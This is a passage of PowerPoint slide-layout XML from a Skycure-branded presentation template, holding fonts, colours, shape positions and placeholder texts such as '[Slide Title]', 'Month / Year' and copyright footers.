              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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3281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96442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2 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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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305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096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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6268100"/>
            <a:ext cx="5442754" cy="325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1400" b="0" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t> Skycure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FCFBF7"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light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457200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sub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0832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143000"/>
            <a:ext cx="8229600" cy="4800600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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Details, details...]</a:t>
            </a:r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096000"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="00549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rgbClr val="00549E"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="0054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3" name="Text Placehold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137160" y="136525"/>
            <a:ext cx="7772400" cy="54927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[Slide Title]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Skycure logo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6248503"/>
            <a:ext cx="1455423" cy="369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8994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143000"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3200" i="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-l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783080" y="5367338"/>
            <a:ext cx="5486400" cy="5486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aseline="0"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[Caption, citation, etc.]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096000"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="00549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rgbClr val="00549E"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="0054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2" name="Text Placehold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137160" y="136525"/>
            <a:ext cx="7772400" cy="54927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[Slide Title]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Skycure logo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6248503"/>
            <a:ext cx="1455423" cy="369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879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6096000"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="00549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rgbClr val="00549E"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="0054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14400" y="2286000"/>
            <a:ext cx="7315200" cy="18288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1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="00549E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[Bold statement!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rhetorical question?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Q &amp; A”, etc.]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placehold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137160" y="136525"/>
            <a:ext cx="7772400" cy="54927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[Slide Title]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Skycure logo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6248503"/>
            <a:ext cx="1455423" cy="369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4212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57200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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4547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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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17445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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120952" y="2723775"/>
            <a:ext cx="492749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solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>SubTitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t> Of Presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3BA2CC"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/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457200" y="6268100"/>
            <a:ext cx="5442754" cy="325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1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© YYYY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>Skycure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>  Ltd.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FCFBF7"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13145932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29101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88914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genda - first insta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94360" y="594360"/>
            <a:ext cx="7955280" cy="44319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188720" y="1828800"/>
            <a:ext cx="6766560" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Arial Black" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr sz="3200" b="0" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
                <a:cs typeface="Adobe Arabic" pitchFamily="18" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="822960" indent="-182880">
              <a:spcBef>
                <a:spcPts val="5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2400" b="0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822960" indent="-182880">
              <a:spcBef>
                <a:spcPts val="5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2400" b="0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822960" indent="-182880">
              <a:spcBef>
                <a:spcPts val="5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2400" b="0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822960" indent="-182880">
              <a:spcBef>
                <a:spcPts val="5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2400" b="0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457200" y="6565392"/>
            <a:ext cx="4648200" cy="1154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en-US" sz="750" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© 2015 Forrester Research, Inc. Reproduction Prohibited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6858000" y="6565392"/>
            <a:ext cx="1828800" cy="21945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>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AE37EF82-0B25-4B89-B1EA-AE4F268844BE}" type="slidenum">
              <a:rPr lang="en-US" sz="750" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="750" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="666666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0717139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5324" y="6390438"/>
            <a:ext cx="4498144" cy="325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1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
                <a:cs typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Title of Presentation DD/MM/YYYY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
              <a:cs typeface="Ubuntu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6311805"/>
            <a:ext cx="3303639" cy="325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14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Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© 2015 Skycure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light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7626" y="6311805"/>
            <a:ext cx="1209040" cy="30899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318000" y="6311805"/>
            <a:ext cx="5161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E0501D9-5188-FC40-BDC1-695A14FB71FE}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lato Bold"/>
              <a:cs typeface="Lato Bold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687926" y="6469168"/>
            <a:ext cx="4560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3D54C05A-1506-564B-B40E-6378EFE62506}" type="slidenum">
              <a:rPr lang="en-US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white">
                  <a:lumMod val="50000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/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4318000" y="6311805"/>
            <a:ext cx="5161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E0501D9-5188-FC40-BDC1-695A14FB71FE}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lato Bold"/>
              <a:cs typeface="Lato Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1812212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66" r:id="rId8"/>
    <p:sldLayoutId id="2147483668" r:id="rId9"/>
    <p:sldLayoutId id="2147483669" r:id="rId10"/>
    <p:sldLayoutId id="2147483670" r:id="rId11"/>
    <p:sldLayoutId id="2147483655" r:id="rId12"/>
    <p:sldLayoutId id="2147483652" r:id="rId13"/>
    <p:sldLayoutId id="2147483651" r:id="rId14"/>
    <p:sldLayoutId id="2147483649" r:id="rId15"/>
    <p:sldLayoutId id="2147483653" r:id="rId16"/>
    <p:sldLayoutId id="2147483699" r:id="rId17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5324" y="6390438"/>
            <a:ext cx="4498144" cy="325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1400" b="0" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
                <a:cs typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Title of Presentation DD/MM/YYYY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
              <a:cs typeface="Ubuntu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"/>
            <a:ext cx="9144000" cy="6202516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCFB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  <a:effectLst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6311805"/>
            <a:ext cx="3303639" cy="325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1400" b="0" i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ato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0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ato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t> Skycure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light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7626" y="6311805"/>
            <a:ext cx="1209040" cy="30899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318000" y="6311805"/>
            <a:ext cx="5161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E0501D9-5188-FC40-BDC1-695A14FB71FE}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0" i="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Bold"/>
              <a:cs typeface="Lato Bold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687926" y="6469168"/>
            <a:ext cx="4560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3D54C05A-1506-564B-B40E-6378EFE62506}" type="slidenum">
              <a:rPr lang="en-US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white">
                  <a:lumMod val="50000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri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1"/>
            <a:ext cx="9144000" cy="6202516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCFB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  <a:effectLst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318000" y="6311805"/>
            <a:ext cx="5161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E0501D9-5188-FC40-BDC1-695A14FB71FE}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0" i="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
